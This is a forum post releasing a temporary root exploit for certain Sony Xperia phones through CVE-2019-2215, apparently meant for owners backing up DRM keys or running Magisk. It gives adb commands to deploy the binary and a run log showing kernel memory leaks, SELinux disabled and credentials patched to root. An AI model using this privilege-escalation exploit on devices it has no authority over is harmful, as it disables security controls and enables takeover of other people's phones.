Let me present you a temp root exploit for sony xperia XZ1 Compact / XZ1 / XZ Premium phones running android oreo firmware.
The exploit uses CVE-2019-2215, which can get you a temporal root shell very quickly and reliably (it's nearly instant).
- XZ1 Compact
- G8441_47.1.A.8.49 (tested myself)
- G8441_47.1.A.16.20 (tested myself)
- XZ Premium
- Xperia XZ1
- G8343_47.1.A.12.150 (Freedom Canada)
- G8343_47.1.A.12.205 (Freedom Canada)
- SO-01K_47.1.F.1.105 (Docomo Japan)
- SOV36_47.1.C.9.106 (AU Japan)
- Xperia XZ1 Compact
- SO-02K_47.1.F.1.105 (Docomo Japan)
- XZ Premium
- SO-04J_47.1.F.1.105 (Docomo Japan)
This is an alternative method to my renoroot exploit release before, to get a temp root shell for TA (drm keys) backup .
I've also implemented a script to start up magisk from the temp root shell, so this can be used nicely with still locked phones to enable magisk root without unlocking bootloader with the latest oreo fw. You still cannot modify anything in /system or /vendor partitions due to dm-verity, but you could use it for other useful stuff, like iptables based firewall for example.
Listed firmware versions may be found for example here:
- to get a simple temp root shell
just download bindershell.zip, unzip, 'adb push bindershell /data/local/tmp' and get temp root:
G8441:/ $ cd /data/local/tmp G8441:/data/local/tmp $ chmod 755 ./bindershell G8441:/data/local/tmp $ ./bindershell bindershell - temp root shell for xperia XZ1c/XZ1/XZp using CVE-2019-2215 https://github.com/j4nn/renoshell/tree/CVE-2019-2215 MAIN: starting exploit for devices with waitqueue at 0x98 PARENT: Reading leaked data PARENT: leaking successful MAIN: thread_info should be in stack MAIN: parsing kernel stack to find thread_info PARENT: Reading leaked data PARENT: Reading extra leaked data PARENT: leaking successful MAIN: task_struct_ptr = ffffffecc9691b00 MAIN: thread_info_ptr = ffffffecc4c34000 MAIN: Clobbering addr_limit MAIN: should have stable kernel R/W now kaslr slide 0x1d35200000 selinux set to permissive current task credentials patched got root, start shell... G8441:/data/local/tmp #
- for temp root with magisk setup
do as in previous option and download also the magisk-setup-from-exploit.zip and Magisk-v19.3-Manager-v7.1.2.zip, unzip both and use following commands in addition (skip starting the bindershell in previous section):
adb install MagiskManager-v7.1.2.apk adb push Magisk-v19.3 /data/local/tmp adb shell 'cd /data/local/tmp/Magisk-v19.3 ; chmod 755 * ; /system/bin/sh ./update-binary -x ; ./magiskinit -x magisk magisk' adb push magisk-setup.sh /data/local/tmp adb shell chmod 755 /data/local/tmp/magisk-setup.sh
The above would copy the needed stuff to your phone.
Then after each boot you can use following command to startup magisk via the exploit:
adb shell 'cd /data/local/tmp ; ./bindershell -c ./magisk-setup.sh'
Source code for the exploit (bindershell) is available here:
Magisk startup script is obviously already in source form inside the magisk-setup-from-exploit.zip archive attached.
Magisk binaries packed in the Magisk-v19.3-Manager-v7.1.2.zip are not modified upstream released Magisk-v19.3.zip and MagiskManager-v7.1.2.apk, extracted only needed components and combined into single archive.
It might be possible to use other versions (v19.3+), but that has not been tested and is not supported in any way.
thanks to @arpruss for the su98 exploit variant (where binder_thread wait queue is at 0x98 offset instead of 0xa0, needed completely different approach than the original exploit) - the core of the exploit up to kernel space r/w primitives has been used